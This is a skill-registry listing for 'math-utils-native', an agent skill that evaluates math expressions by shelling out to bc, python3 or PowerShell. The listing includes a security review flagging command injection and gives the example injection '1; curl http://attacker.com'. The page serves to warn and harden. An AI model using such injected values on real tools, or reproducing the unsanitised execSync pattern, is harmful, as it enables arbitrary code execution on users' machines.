Math Utils Native

by johnnyhou327 · GitHub ↗ · v1.0.1 · MIT-0
cross-platform ⚠ suspicious
Downloads: 418
Stars: 0
Active Installs: 3
Versions: 2
Install in OpenClaw
/install math-utils-native
Description
Performs precise math calculations by executing native OS CLI tools like bc, python3, or PowerShell without relying on AI prediction.
Usage Guidance
This skill evaluates math expressions by building shell/PowerShell commands from the input and running them with execSync. That means a malicious or malformed expression can inject arbitrary shell commands on the host (e.g., expressions containing ;, $(), backticks, quotes, or other metacharacters).
If you plan to install or run this skill, only do so on an isolated, non-production host or container. Prefer safer alternatives: use a dedicated math parser library (e.g., decimal.js, mathjs) or evaluate expressions in a sandboxed process. If you must keep the current approach, apply strict input validation/whitelisting (allow only digits, whitespace, parentheses, and a limited set of operators) and avoid passing user input into a shell string; use execFile/spawn with arguments or a library that evaluates expressions without invoking a shell.
If you need help hardening this skill, ask for specific code changes (e.g., a sanitized evaluator or replacement with a trusted math library).
Capability Analysis
Type: OpenClaw Skill
Name: math-utils-native
Version: 1.0.1
The skill contains a critical command injection vulnerability in `main.js` where the `calculate` function directly interpolates user-provided input into shell commands via `execSync`. This allows for arbitrary code execution on the host system using `bc`, `python3`, or `PowerShell` (e.g., by passing an expression like `1; curl http://attacker.com`). While the behavior aligns with the stated purpose of a native math utility, the lack of any input sanitization makes it highly dangerous.
Capability Assessment
Purpose & Capability
Name/description match the implementation: it executes local CLI tools (bc, python3, PowerShell) to compute expressions. No unrelated credentials, binaries, or installs are requested.
Instruction Scope
SKILL.md explicitly instructs executing local CLI commands to evaluate expressions. The shipped main.js directly interpolates the supplied expression into shell commands (execSync with a single command string) without validation or sanitization, creating a command-injection risk. The instructions do not mention input validation, sandboxing, or safety constraints.
Install Mechanism
No install spec (instruction-only + small code file). Nothing is downloaded or installed by the skill, so there is no supply-chain install risk here.
Credentials
The skill requests no environment variables, credentials, or config paths — appropriate and minimal for the stated purpose.
Persistence & Privilege
always is false and the skill does not request any special persistent or cross-skill privileges. It runs on-demand and does not modify other skills or system-wide settings.
How to Use
  1. Make sure OpenClaw is installed (local or Docker)
  2. Run the install command in chat: /install math-utils-native
  3. After installation, invoke the skill by name or use /math-utils-native
  4. Provide required inputs per the skill's parameter spec and get structured output
Version History
v1.0.1
- No changes detected; this version is functionally identical to the previous release.
- All descriptions, usage instructions, and implementation details remain unchanged.
v1.0.0
Initial release of math-utils-native:
- Provides accurate mathematical computation by invoking the operating system’s native CLI calculator tools.
- Supports Linux, macOS, and Windows by auto-detecting OS and choosing appropriate calculation backends (`bc`, `python3`, or PowerShell).
- Exposes a `calculate(expression)` function for precise evaluation of math expressions.
- Ensures all results are computed and validated at the system level, independent of language model prediction.
Metadata
Slug math-utils-native
Version 1.0.1
License MIT-0
All-time Installs 3
Active Installs 3
Total Versions 2
Frequently Asked Questions

What is Math Utils Native?

Performs precise math calculations by executing native OS CLI tools like bc, python3, or PowerShell without relying on AI prediction. It is an AI Agent Skill for Claude Code / OpenClaw, with 418 downloads so far.

How do I install Math Utils Native?

Run "/install math-utils-native" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.

Is Math Utils Native free?

Yes, Math Utils Native is completely free, licensed under MIT-0. You can download, install and use it at no cost.

Which platforms does Math Utils Native support?

Math Utils Native is cross-platform and runs anywhere OpenClaw / Claude Code is available.

Who created Math Utils Native?

It is built and maintained by johnnyhou327 (@johnnyhou327); the current version is v1.0.1.
